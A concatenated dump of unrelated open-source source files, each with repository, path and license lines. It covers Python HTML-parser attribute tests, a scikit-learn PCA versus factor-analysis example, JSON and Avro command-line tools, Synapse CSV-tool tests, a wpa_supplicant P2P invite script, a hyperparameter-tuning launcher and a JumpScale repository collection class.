c:d=v e-f=v>", [("starttag", "a", [("a.b", "v"), ("c:d", "v"), ("e-f", "v")])]) def test_entityrefs_in_attributes(self): self._run_check( "<html foo='&euro;&amp;&#97;&#x61;&unsupported;'>", [("starttag", "html", [("foo", "\u20AC&aa&unsupported;")])]) class AttributesTolerantTestCase(AttributesStrictTestCase): def get_collector(self): return EventCollector(strict=False) def test_attr_funky_names2(self): self._run_check( "<a $><b $=%><c \=/>", [("starttag", "a", [("$", None)]), ("starttag", "b", [("$", "%")]), ("starttag", "c", [("\\", "/")])]) def test_entities_in_attribute_value(self): # see #1200313 for entity in ['&', '&amp;', '&#38;', '&#x26;']: self._run_check('<a href="%s">' % entity, [("starttag", "a", [("href", "&")])]) self._run_check("<a href='%s'>" % entity, [("starttag", "a", [("href", "&")])]) self._run_check("<a href=%s>" % entity, [("starttag", "a", [("href", "&")])]) def test_malformed_attributes(self): # see #13357 html = ( "<a href=test'style='color:red;bad1'>test - bad1</a>" "<a href=test'+style='color:red;ba2'>test - bad2</a>" "<a href=test'&nbsp;style='color:red;bad3'>test - bad3</a>" "<a href = test'&nbsp;style='color:red;bad4' >test - bad4</a>" ) expected = [ ('starttag', 'a', [('href', "test'style='color:red;bad1'")]), ('data', 'test - bad1'), ('endtag', 'a'), ('starttag', 'a', [('href', "test'+style='color:red;ba2'")]), ('data', 'test - bad2'), ('endtag', 'a'), ('starttag', 'a', [('href', "test'\xa0style='color:red;bad3'")]), ('data', 'test - bad3'), ('endtag', 'a'), ('starttag', 'a', [('href', "test'\xa0style='color:red;bad4'")]), ('data', 'test - bad4'), ('endtag', 'a') ] self._run_check(html, expected) def test_malformed_adjacent_attributes(self): # see #12629 self._run_check('<x><y z=""o"" /></x>', [('starttag', 'x', []), ('startendtag', 'y', [('z', ''), ('o""', None)]), ('endtag', 'x')]) self._run_check('<x><y z="""" /></x>', [('starttag', 'x', []), ('startendtag', 'y', [('z', ''), ('""', None)]), ('endtag', 'x')]) # see #755670 for the following 3 tests def test_adjacent_attributes(self): self._run_check('<a width="100%"cellspacing=0>', [("starttag", "a", [("width", "100%"), ("cellspacing","0")])]) self._run_check('<a id="foo"class="bar">', [("starttag", "a", [("id", "foo"), ("class","bar")])]) def test_missing_attribute_value(self): self._run_check('<a v=>', [("starttag", "a", [("v", "")])]) def test_javascript_attribute_value(self): self._run_check("<a href=javascript:popup('/popup/help.html')>", [("starttag", "a", [("href", "javascript:popup('/popup/help.html')")])]) def test_end_tag_in_attribute_value(self): # see #1745761 self._run_check("<a href='http://www.example.org/\">;'>spam</a>", [("starttag", "a", [("href", "http://www.example.org/\">;")]), ("data", "spam"), ("endtag", "a")]) def test_main(): support.run_unittest(HTMLParserStrictTestCase, HTMLParserTolerantTestCase, AttributesStrictTestCase, AttributesTolerantTestCase) if __name__ == "__main__": test_main()
bsd-3-clause
q1ang/scikit-learn
examples/decomposition/plot_pca_vs_fa_model_selection.py
142
4467
""" =============================================================== Model selection with Probabilistic PCA and Factor Analysis (FA) =============================================================== Probabilistic PCA and Factor Analysis are probabilistic models. The consequence is that the likelihood of new data can be used for model selection and covariance estimation. Here we compare PCA and FA with cross-validation on low rank data corrupted with homoscedastic noise (noise variance is the same for each feature) or heteroscedastic noise (noise variance is the different for each feature). In a second step we compare the model likelihood to the likelihoods obtained from shrinkage covariance estimators. One can observe that with homoscedastic noise both FA and PCA succeed in recovering the size of the low rank subspace. The likelihood with PCA is higher than FA in this case. However PCA fails and overestimates the rank when heteroscedastic noise is present. Under appropriate circumstances the low rank models are more likely than shrinkage models. The automatic estimation from Automatic Choice of Dimensionality for PCA. NIPS 2000: 598-604 by Thomas P. Minka is also compared. """ print(__doc__) # Authors: Alexandre Gramfort # Denis A. Engemann # License: BSD 3 clause import numpy as np import matplotlib.pyplot as plt from scipy import linalg from sklearn.decomposition import PCA, FactorAnalysis from sklearn.covariance import ShrunkCovariance, LedoitWolf from sklearn.cross_validation import cross_val_score from sklearn.grid_search import GridSearchCV ############################################################################### # Create the data n_samples, n_features, rank = 1000, 50, 10 sigma = 1. rng = np.random.RandomState(42) U, _, _ = linalg.svd(rng.randn(n_features, n_features)) X = np.dot(rng.randn(n_samples, rank), U[:, :rank].T) # Adding homoscedastic noise X_homo = X + sigma * rng.randn(n_samples, n_features) # Adding heteroscedastic noise sigmas = sigma * rng.rand(n_features) + sigma / 2. X_hetero = X + rng.randn(n_samples, n_features) * sigmas ############################################################################### # Fit the models n_components = np.arange(0, n_features, 5) # options for n_components def compute_scores(X): pca = PCA() fa = FactorAnalysis() pca_scores, fa_scores = [], [] for n in n_components: pca.n_components = n fa.n_components = n pca_scores.append(np.mean(cross_val_score(pca, X))) fa_scores.append(np.mean(cross_val_score(fa, X))) return pca_scores, fa_scores def shrunk_cov_score(X): shrinkages = np.logspace(-2, 0, 30) cv = GridSearchCV(ShrunkCovariance(), {'shrinkage': shrinkages}) return np.mean(cross_val_score(cv.fit(X).best_estimator_, X)) def lw_score(X): return np.mean(cross_val_score(LedoitWolf(), X)) for X, title in [(X_homo, 'Homoscedastic Noise'), (X_hetero, 'Heteroscedastic Noise')]: pca_scores, fa_scores = compute_scores(X) n_components_pca = n_components[np.argmax(pca_scores)] n_components_fa = n_components[np.argmax(fa_scores)] pca = PCA(n_components='mle') pca.fit(X) n_components_pca_mle = pca.n_components_ print("best n_components by PCA CV = %d" % n_components_pca) print("best n_components by FactorAnalysis CV = %d" % n_components_fa) print("best n_components by PCA MLE = %d" % n_components_pca_mle) plt.figure() plt.plot(n_components, pca_scores, 'b', label='PCA scores') plt.plot(n_components, fa_scores, 'r', label='FA scores') plt.axvline(rank, color='g', label='TRUTH: %d' % rank, linestyle='-') plt.axvline(n_components_pca, color='b', label='PCA CV: %d' % n_components_pca, linestyle='--') plt.axvline(n_components_fa, color='r', label='FactorAnalysis CV: %d' % n_components_fa, linestyle='--') plt.axvline(n_components_pca_mle, color='k', label='PCA MLE: %d' % n_components_pca_mle, linestyle='--') # compare with other covariance estimators plt.axhline(shrunk_cov_score(X), color='violet', label='Shrunk Covariance MLE', linestyle='-.') plt.axhline(lw_score(X), color='orange', label='LedoitWolf MLE' % n_components_pca_mle, linestyle='-.') plt.xlabel('nb of components') plt.ylabel('CV scores') plt.legend(loc='lower right') plt.title(title) plt.show()
bsd-3-clause
borysiasty/inasafe
safe_extras/simplejson/tool.py
262
1136
r"""Command-line tool to validate and pretty-print JSON Usage:: $ echo '{"json":"obj"}' | python -m simplejson.tool { "json": "obj" } $ echo '{ 1.2:3.4}' | python -m simplejson.tool Expecting property name: line 1 column 2 (char 2) """ from __future__ import with_statement import sys import simplejson as json def main(): if len(sys.argv) == 1: infile = sys.stdin outfile = sys.stdout elif len(sys.argv) == 2: infile = open(sys.argv[1], 'r') outfile = sys.stdout elif len(sys.argv) == 3: infile = open(sys.argv[1], 'r') outfile = open(sys.argv[2], 'w') else: raise SystemExit(sys.argv[0] + " [infile [outfile]]") with infile: try: obj = json.load(infile, object_pairs_hook=json.OrderedDict, use_decimal=True) except ValueError: raise SystemExit(sys.exc_info()[1]) with outfile: json.dump(obj, outfile, sort_keys=True, indent=' ', use_decimal=True) outfile.write('\n') if __name__ == '__main__': main()
gpl-3.0
vertexproject/synapse
synapse/tests/test_tools_csvtool.py
1
6295
import csv from unittest import mock import synapse.common as s_common import synapse.telepath as s_telepath import synapse.tests.utils as s_t_utils import synapse.tools.csvtool as s_csvtool csvfile = b'''ipv4,fqdn,notes 1.2.3.4,vertex.link,malware 8.8.8.8,google.com,whitelist ''' csvstorm = b''' for ($ipv4, $fqdn, $note) in $rows { $lib.print("oh hai") [ inet:dns:a=($fqdn,$ipv4) ] } ''' csvfile_missing = b'''fqdn,email,tag vertex.link,,mytag google.com,myemail@email.com, yahoo.com,foo@bar.com,mytag ''' csvstorm_missing = b''' for ($fqdn, $email, $tag) in $rows { $lib.print("hello hello") [ inet:dns:soa=$lib.guid() :fqdn=$fqdn :email?=$email +?#$tag ] } ''' # count is used for test coverage. csvstorm_export = b''' test:int $lib.csv.emit($node, $node.props.loc) | count ''' class CsvToolTest(s_t_utils.SynTest): def _getOldSynVers(self): return (0, 0, 0) async def test_csvtool(self): async with self.getTestCore() as core: url = core.getLocalUrl() dirn = s_common.gendir(core.dirn, 'junk') logpath = s_common.genpath(dirn, 'csvtest.log') csvpath = s_common.genpath(dirn, 'csvtest.csv') with s_common.genfile(csvpath) as fd: fd.write(csvfile) stormpath = s_common.genpath(dirn, 'csvtest.storm') with s_common.genfile(stormpath) as fd: fd.write(csvstorm) argv = ['--csv-header', '--debug', '--cortex', url, '--logfile', logpath, stormpath, csvpath] outp = self.getTestOutp() await s_csvtool.main(argv, outp=outp) outp.expect('oh hai') outp.expect('2 nodes') with mock.patch('synapse.telepath.Proxy._getSynVers', self._getOldSynVers): outp = self.getTestOutp() await s_csvtool.main(argv, outp=outp) outp.expect('Cortex version 0.0.0 is outside of the csvtool supported range') async def test_csvtool_missingvals(self): async with self.getTestCore() as core: url = core.getLocalUrl() dirn = s_common.gendir(core.dirn, 'junk') logpath = s_common.genpath(dirn, 'csvtest.log') csvpath = s_common.genpath(dirn, 'csvtest.csv') with s_common.genfile(csvpath) as fd: fd.write(csvfile_missing) stormpath = s_common.genpath(dirn, 'csvtest.storm') with s_common.genfile(stormpath) as fd: fd.write(csvstorm_missing) argv = ['--csv-header', '--debug', '--cortex', url, '--logfile', logpath, stormpath, csvpath] outp = self.getTestOutp() await s_csvtool.main(argv, outp=outp) outp.expect('hello hello') outp.expect("'fqdn': 'google.com'") outp.expect('3 nodes') async def test_csvtool_local(self): with self.getTestDir() as dirn: logpath = s_common.genpath(dirn, 'csvtest.log') csvpath = s_common.genpath(dirn, 'csvtest.csv') with s_common.genfile(csvpath) as fd: fd.write(csvfile) stormpath = s_common.genpath(dirn, 'csvtest.storm') with s_common.genfile(stormpath) as fd: fd.write(csvstorm) argv = ['--csv-header', '--debug', '--test', '--logfile', logpath, stormpath, csvpath] outp = self.getTestOutp() await s_csvtool.main(argv, outp=outp) outp.expect('2 nodes') async def test_csvtool_cli(self): with self.getTestDir() as dirn: logpath = s_common.genpath(dirn, 'csvtest.log') csvpath = s_common.genpath(dirn, 'csvtest.csv') with s_common.genfile(csvpath) as fd: fd.write(csvfile) stormpath = s_common.genpath(dirn, 'csvtest.storm') with s_common.genfile(stormpath) as fd: fd.write(csvstorm) argv = ['--csv-header', '--debug', '--cli', '--test', '--logfile', logpath, stormpath, csvpath] outp = self.getTestOutp() cmdg = s_t_utils.CmdGenerator(['storm --hide-props inet:fqdn', EOFError(), ]) with self.withCliPromptMockExtendOutp(outp): with self.withTestCmdr(cmdg): await s_csvtool.main(argv, outp=outp) outp.expect('inet:fqdn=google.com') outp.expect('2 nodes') async def test_csvtool_export(self): async with self.getTestCore() as core: await core.nodes('[ test:int=20 :loc=us ]') await core.nodes('[ test:int=30 :loc=cn ]') await core.nodes('[ test:int=40 ]') url = core.getLocalUrl() dirn = s_common.gendir(core.dirn, 'junk') csvpath = s_common.genpath(dirn, 'csvtest.csv') stormpath = s_common.genpath(dirn, 'csvtest.storm') with s_common.genfile(stormpath) as fd: fd.write(csvstorm_export) # test a few no-no cases argv = ['--test', '--export', stormpath, csvpath] outp = self.getTestOutp() await s_csvtool.main(argv, outp=outp) outp.expect('--export requires --cortex') argv = ['--cortex', url, '--export', stormpath, csvpath, 'lol.csv'] outp = self.getTestOutp() await s_csvtool.main(argv, outp=outp) outp.expect('--export requires exactly 1 csvfile') argv = ['--cortex', url, '--export', stormpath, csvpath] outp = self.getTestOutp() await s_csvtool.main(argv, outp=outp) outp.expect('Counted 3 nodes.') outp.expect('3 csv rows') with open(csvpath, 'r') as fd: rows = [row for row in csv.reader(fd)] self.eq(rows, (['20', 'us'], ['30', 'cn'], ['40', ''])) with mock.patch('synapse.telepath.Proxy._getSynVers', self._getOldSynVers): outp = self.getTestOutp() await s_csvtool.main(argv, outp=outp) outp.expect(f'Cortex version 0.0.0 is outside of the csvtool supported range')
apache-2.0
ntent-ad/avro
lang/py3/avro/tool.py
21
5293
#!/usr/bin/env python3 # -*- mode: python -*- # -*- coding: utf-8 -*- # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Command-line tool NOTE: The API for the command-line tool is experimental. """ import sys import urllib from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler from avro import io from avro import datafile from avro import protocol from avro import ipc class GenericResponder(ipc.Responder): def __init__(self, proto, msg, datum): proto_json = file(proto, 'r').read() ipc.Responder.__init__(self, protocol.Parse(proto_json)) self.msg = msg self.datum = datum def invoke(self, message, request): if message.name == self.msg: print >> sys.stderr, "Message: %s Datum: %s" % (message.name, self.datum) # server will shut down after processing a single Avro request global server_should_shutdown server_should_shutdown = True return self.datum class GenericHandler(BaseHTTPRequestHandler): def do_POST(self): self.responder = responder call_request_reader = ipc.FramedReader(self.rfile) call_request = call_request_reader.read_framed_message() resp_body = self.responder.respond(call_request) self.send_response(200) self.send_header('Content-Type', 'avro/binary') self.end_headers() resp_writer = ipc.FramedWriter(self.wfile) resp_writer.write_framed_message(resp_body) if server_should_shutdown: print >> sys.stderr, "Shutting down server." self.server.force_stop() class StoppableHTTPServer(HTTPServer): """HTTPServer.shutdown added in Python 2.6. FML.""" stopped = False allow_reuse_address = True def __init__(self, *args, **kw): HTTPServer.__init__(self, *args, **kw) self.allow_reuse_address = True def serve_forever(self): while not self.stopped: self.handle_request() def force_stop(self): self.server_close() self.stopped = True self.serve_forever() def run_server(uri, proto, msg, datum): url_obj = urllib.parse.urlparse(uri) server_addr = (url_obj.hostname, url_obj.port) global responder global server_should_shutdown server_should_shutdown = False responder = GenericResponder(proto, msg, datum) server = StoppableHTTPServer(server_addr, GenericHandler) print("Port: %s" % server.server_port) sys.stdout.flush() server.allow_reuse_address = True print >> sys.stderr, "Starting server." server.serve_forever() def send_message(uri, proto, msg, datum): url_obj = urllib.parse.urlparse(uri) client = ipc.HTTPTransceiver(url_obj.hostname, url_obj.port) proto_json = file(proto, 'r').read() requestor = ipc.Requestor(protocol.Parse(proto_json), client) print(requestor.request(msg, datum)) def file_or_stdin(f): if f == "-": return sys.stdin else: return file(f) def main(args=sys.argv): if len(args) == 1: print("Usage: %s [dump|rpcreceive|rpcsend]" % args[0]) return 1 if args[1] == "dump": if len(args) != 3: print("Usage: %s dump input_file" % args[0]) return 1 for d in datafile.DataFileReader(file_or_stdin(args[2]), io.DatumReader()): print(repr(d)) elif args[1] == "rpcreceive": usage_str = "Usage: %s rpcreceive uri protocol_file " % args[0] usage_str += "message_name (-data d | -file f)" if len(args) not in [5, 7]: print(usage_str) return 1 uri, proto, msg = args[2:5] datum = None if len(args) > 5: if args[5] == "-file": reader = open(args[6], 'rb') datum_reader = io.DatumReader() dfr = datafile.DataFileReader(reader, datum_reader) datum = dfr.next() elif args[5] == "-data": print("JSON Decoder not yet implemented.") return 1 else: print(usage_str) return 1 run_server(uri, proto, msg, datum) elif args[1] == "rpcsend": usage_str = "Usage: %s rpcsend uri protocol_file " % args[0] usage_str += "message_name (-data d | -file f)" if len(args) not in [5, 7]: print(usage_str) return 1 uri, proto, msg = args[2:5] datum = None if len(args) > 5: if args[5] == "-file": reader = open(args[6], 'rb') datum_reader = io.DatumReader() dfr = datafile.DataFileReader(reader, datum_reader) datum = dfr.next() elif args[5] == "-data": print("JSON Decoder not yet implemented.") return 1 else: print(usage_str) return 1 send_message(uri, proto, msg, datum) return 0 if __name__ == "__main__": sys.exit(main(sys.argv))
apache-2.0
indashnet/InDashNet.Open.UN2000
android/external/wpa_supplicant_8/wpa_supplicant/examples/p2p/p2p_invite.py
29
5237
#!/usr/bin/python # Tests p2p_invite ######### MAY NEED TO RUN AS SUDO ############# import dbus import sys, os import time import gobject import getopt import threading from dbus.mainloop.glib import DBusGMainLoop def usage(): print "Usage:" print " %s -i <interface_name> -a <addr> \ " \ % sys.argv[0] print " [-o <persistent_group_object>] [-w <wpas_dbus_interface>]" print "Options:" print " -i = interface name" print " -a = address of peer" print " -o = persistent group object path" print " -w = wpas dbus interface = fi.w1.wpa_supplicant1" print "Example:" print " %s -i p2p-wlan0-0 -a 00150083523c" % sys.argv[0] # Required Signals def InvitationResult(invite_result): print "Inviation Result signal :" status = invite_result['status'] print "status = ", status if invite_result.has_key('BSSID'): bssid = invite_result['BSSID'] print "BSSID = ", hex(bssid[0]) , ":" , \ hex(bssid[1]) , ":" , hex(bssid[2]) , ":", \ hex(bssid[3]) , ":" , hex(bssid[4]) , ":" , \ hex(bssid[5]) os._exit(0) class P2P_Invite (threading.Thread): # Needed Variables global bus global wpas_object global interface_object global p2p_interface global interface_name global wpas global wpas_dbus_interface global path global addr global persistent_group_object # Dbus Paths global wpas_dbus_opath global wpas_dbus_interfaces_opath global wpas_dbus_interfaces_interface global wpas_dbus_interfaces_p2pdevice # Arguements global P2PDictionary # Constructor def __init__(self,interface_name,wpas_dbus_interface,addr, persistent_group_object): # Initializes variables and threads self.interface_name = interface_name self.wpas_dbus_interface = wpas_dbus_interface self.addr = addr self.persistent_group_object = persistent_group_object # Initializes thread and daemon allows for ctrl-c kill threading.Thread.__init__(self) self.daemon = True # Generating interface/object paths self.wpas_dbus_opath = "/" + \ self.wpas_dbus_interface.replace(".","/") self.wpas_wpas_dbus_interfaces_opath = self.wpas_dbus_opath + \ "/Interfaces" self.wpas_dbus_interfaces_interface = \ self.wpas_dbus_interface + ".Interface" self.wpas_dbus_interfaces_p2pdevice = \ self.wpas_dbus_interfaces_interface \ + ".P2PDevice" # Getting interfaces and objects DBusGMainLoop(set_as_default=True) self.bus = dbus.SystemBus() self.wpas_object = self.bus.get_object( self.wpas_dbus_interface, self.wpas_dbus_opath) self.wpas = dbus.Interface(self.wpas_object, self.wpas_dbus_interface) # Try to see if supplicant knows about interface # If not, throw an exception try: self.path = self.wpas.GetInterface( self.interface_name) except dbus.DBusException, exc: error = 'Error:\n Interface ' + self.interface_name \ + ' was not found' print error usage() os._exit(0) self.interface_object = self.bus.get_object( self.wpas_dbus_interface, self.path) self.p2p_interface = dbus.Interface(self.interface_object, self.wpas_dbus_interfaces_p2pdevice) #Adds listeners self.bus.add_signal_receiver(InvitationResult, dbus_interface=self.wpas_dbus_interfaces_p2pdevice, signal_name="InvitationResult") # Sets up p2p_invite dictionary def constructArguements(self): self.P2PDictionary = \ {'peer':dbus.ObjectPath(self.path+'/Peers/'+self.addr)} if (self.persistent_group_object != None): self.P2PDictionary.update({"persistent_group_object": self.persistent_group_object}) # Run p2p_invite def run(self): try: self.p2p_interface.Invite(self.P2PDictionary) except: print "Error:\n Invalid Arguements" usage() os._exit(0) # Allows other threads to keep working while MainLoop runs # Required for timeout implementation gobject.MainLoop().get_context().iteration(True) gobject.threads_init() gobject.MainLoop().run() if __name__ == "__main__": # Defaults for optional inputs addr = None persistent_group_object = None wpas_dbus_interface = 'fi.w1.wpa_supplicant1' # interface_name is required interface_name = None # Using getopts to handle options try: options, args = getopt.getopt(sys.argv[1:],"hi:o:w:a:") except getopt.GetoptError: usage() quit() # If theres a switch, override default option for key, value in options: # Help if (key == "-h"): usage() quit() # Interface Name elif (key == "-i"): interface_name = value elif (key == "-a"): addr = value # Persistent group object path elif (key == "-o"): persistent_group_object = value # Dbus interface elif (key == "-w"): wpas_dbus_interface = value else: assert False, "unhandled option" # Interface name is required and was not given if (interface_name == None): print "Error:\n interface_name is required" usage() quit() if (addr == None): print "Error:\n peer address is required" usage() quit() try: p2p_invite_test = \ P2P_Invite(interface_name,wpas_dbus_interface, addr,persistent_group_object) except: print "Error:\n Invalid Arguements" usage() os._exit(1) p2p_invite_test.constructArguements() p2p_invite_test.start() time.sleep(10) print "Error:\n p2p_invite timed out" os._exit(0)
apache-2.0
google-research/social_cascades
news/google/launch_optimizer_main.py
1
7283
# Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Launcher for main.py on PyTorch with GPUs using JobTrialGenerator. Note that JobTrialGenerator uses CAIP Optimizer for automatic hyperparameter tuning, which requires the training executable to report measurements via setting up a CAIP Optimizer client. """ import os from absl import app from absl import flags import termcolor from google3.learning.brain.frameworks import xcloud as xm from google3.learning.deepmind.xmanager import hyper from google3.learning.vizier.service import automated_stopping_pb2 from google3.learning.vizier.service import vizier_pb2 GCS_PATH_PREFIX = 'gs://' FLAGS = flags.FLAGS flags.DEFINE_string('project_name', 'traceminer', 'name for the project') flags.DEFINE_string('image_uri', None, 'A URI to a prebuilt Docker image, including tag.') flags.DEFINE_string('base_image', None, 'A URI to a prebuilt Docker image, for option2.') flags.DEFINE_boolean('use_gpu', True, 'use GPU') flags.DEFINE_string('acc_type', 'v100', 'Accelerator type, v100 or t4') flags.DEFINE_integer('num_gpus', 1, 'Number of GPUs.') flags.DEFINE_string('gcs_path_in', None, ('A GCS directory within a bucket to store input' 'in gs://bucket/directory format.')) flags.DEFINE_string('gcs_path_out', None, ('A GCS directory within a bucket to store output ' 'in gs://bucket/directory format.')) flags.DEFINE_string('task', 'cat', ('task: sr(subreddit classification), ' 'cat(url categorization), ' 'fake(fake news detection)')) flags.DEFINE_string('local_path_in', './fake_input/', 'local path for input') flags.DEFINE_string('local_path_out', './fake_output/', 'local path for output') flags.DEFINE_string('g_emb', '', 'graph embedding file') flags.DEFINE_string('seq_file', '', 'post sequence file') flags.DEFINE_string('balance_df', '', 'the balanced dataset with url ids') # RNN, LSTM parameters flags.DEFINE_string('model', 'rnn', 'rnn, lstm') flags.DEFINE_float('train_ratio', 0.8, 'training data ratio') flags.DEFINE_float('val_ratio', 0.1, 'validation data ratio') flags.DEFINE_integer('batch_size', 64, 'bacth size for rnn') flags.DEFINE_integer('hid_dim', 32, 'hidden dimension in RNN, LSTM') flags.DEFINE_integer('num_layers', 2, 'number of layers in RNN, LSTM') flags.DEFINE_boolean('bi', False, 'birectional') flags.DEFINE_float('dropout', 0.8, 'dropout') flags.DEFINE_integer('epochs', 40, 'epochs') flags.DEFINE_float('lr', 0.002, 'learning rate') flags.DEFINE_integer('print_step', 10, 'print step during training') flags.DEFINE_boolean('save_model', False, 'save model') flags.DEFINE_string('name', '', 'specify model name') # Flag specifications flags.mark_flag_as_required('gcs_path_in') flags.mark_flag_as_required('gcs_path_out') flags.register_validator('gcs_path_in', lambda value: GCS_PATH_PREFIX in value, message=('--gcs_path_in must follow' 'gs://bucket/directory format')) flags.register_validator('gcs_path_out', lambda value: GCS_PATH_PREFIX in value, message=('--gcs_path_out must follow' 'gs://bucket/directory format')) def main(_): if FLAGS.use_gpu: accelerator = xm.GPU('nvidia-tesla-' + FLAGS.acc_type.lower(), FLAGS.num_gpus) else: accelerator = None runtime = xm.CloudRuntime( cpu=3, memory=24, accelerator=accelerator, ) args = { 'task': FLAGS.task, 'gcs_path_in': FLAGS.gcs_path_in, 'gcs_path_out': FLAGS.gcs_path_out, 'local_path_in': FLAGS.local_path_in, 'local_path_out': FLAGS.local_path_out, 'g_emb': FLAGS.g_emb, 'seq_file': FLAGS.seq_file, 'balance_df': FLAGS.balance_df, 'train_ratio': FLAGS.train_ratio, 'val_ratio': FLAGS.val_ratio, 'bi': FLAGS.bi, 'dropout': FLAGS.dropout, 'print_step': FLAGS.print_step, 'save_model': FLAGS.save_model, 'name': FLAGS.name, 'use_optimizer': True } if FLAGS.image_uri: # Option 1 This will use a user-defined docker image. executable = xm.CloudDocker( name=FLAGS.project_name, runtime=runtime, image_uri=FLAGS.image_uri, args=args, ) else: # Option 2 This will build a docker image for the user. Set up environment. executable = xm.CloudPython( name=FLAGS.project_name, runtime=runtime, project_path=( os.path.dirname(os.path.dirname(os.path.realpath(__file__)))), module_name='gnns_for_news.main', base_image=FLAGS.base_image, args=args, build_steps=(xm.steps.default_build_steps('gnns_for_news')), ) # Set UNIT_LOG_SCALE to explore more values in the lower range # Set UNIT_REVERSE_LOG_SCALE to explore more values in the higher range parameters = [ hyper.get_vizier_parameter_config( 'model', hyper.categorical(['rnn', 'lstm'])), hyper.get_vizier_parameter_config( 'batch_size', hyper.discrete([16 * k for k in range(1, 6)])), hyper.get_vizier_parameter_config( 'hid_dim', hyper.discrete([16 * k for k in range(3, 10)])), hyper.get_vizier_parameter_config( 'num_layers', hyper.discrete([1, 2])), hyper.get_vizier_parameter_config( 'lr', hyper.interval(0.00001, 0.2), scaling='UNIT_LOG_SCALE'), hyper.get_vizier_parameter_config( 'dropout', hyper.discrete([0.0, 0.15, 0.3, 0.5, 0.7])), hyper.get_vizier_parameter_config( 'epochs', hyper.discrete([5, 10, 20, 30])) ] vizier_study_config = vizier_pb2.StudyConfig() for parameter in parameters: vizier_study_config.parameter_configs.add().CopyFrom(parameter) metric = vizier_study_config.metric_information.add() metric.name = 'valf1' metric.goal = vizier_pb2.StudyConfig.GoalType.Value('MAXIMIZE') # None early stopping early_stopping = automated_stopping_pb2.AutomatedStoppingConfig() vizier_study_config.automated_stopping_config.CopyFrom(early_stopping) exploration = xm.HyperparameterOptimizer( executable=executable, max_num_trials=128, parallel_evaluations=8, vizier_study_config=vizier_study_config ) xm.launch(xm.ExperimentDescription(FLAGS.project_name), exploration) no_prefix = FLAGS.gcs_path_out.lstrip(GCS_PATH_PREFIX) print() print('When your job completes, you will see artifacts in ' + termcolor.colored( f'https://pantheon.corp.google.com/storage/browser/{no_prefix}', color='blue')) if __name__ == '__main__': app.run(main)
apache-2.0
Jumpscale/jumpscale_core8
lib/JumpScale/tools/issuemanager/models/repoCollection.py
1
2535
from JumpScale import j base = j.data.capnp.getModelBaseClassCollection() class RepoCollection(base): """ This class represent a collection of Issues """ def list(self, owner=0, name='', id=0, source="", returnIndex=False): """ List all keys of repo model with specified params. @param owner int,, id of owner the repo belongs to. @param name str,, name of repo. @param id int,, repo id in db. @param source str,, source of remote database. @param returnIndexalse bool,, return the index used. """ if owner == "": owner = ".*" if name == "": name = ".*" if id == "" or id == 0: id = ".*" if source == "": source = ".*" regex = "%s:%s:%s:%s" % (owner, name, id, source) return self._index.list(regex, returnIndex=returnIndex) def find(self, owner='', name='', id=0, milestone=0, member=0, label='', source=""): """ List all instances of repo model with specified params. @param owner int,, id of owner the repo belongs to. @param name str,, name of repo. @param id int,, repo id in db. @param milestone int,, id of milestone in repo. @param member int,, id of member in repo. @param milestone int,, label in repo. @param source str,, source of remote database. @param returnIndexalse bool,, return the index used. """ res = [] for key in self.list(owner=owner, name=name, id=id, source=source): res.append(self.get(key)) if milestone: for model in res[::-1]: for milestone_model in model.dictFiltered.get('milestones', []): if milestone == milestone_model['id']: break else: res.remove(model) if member: for model in res[::-1]: for member_model in model.dictFiltered.get('members', []): if member == member_model['userKey']: break else: res.remove(model) if label: for model in res[::-1]: if (label not in model.dictFiltered.get('labels', [])) or not model.dictFiltered.get('labels', False): res.remove(model) return res def getFromId(self, id): key = self._index.lookupGet("issue_id", id) return self.get(key)
apache-2.0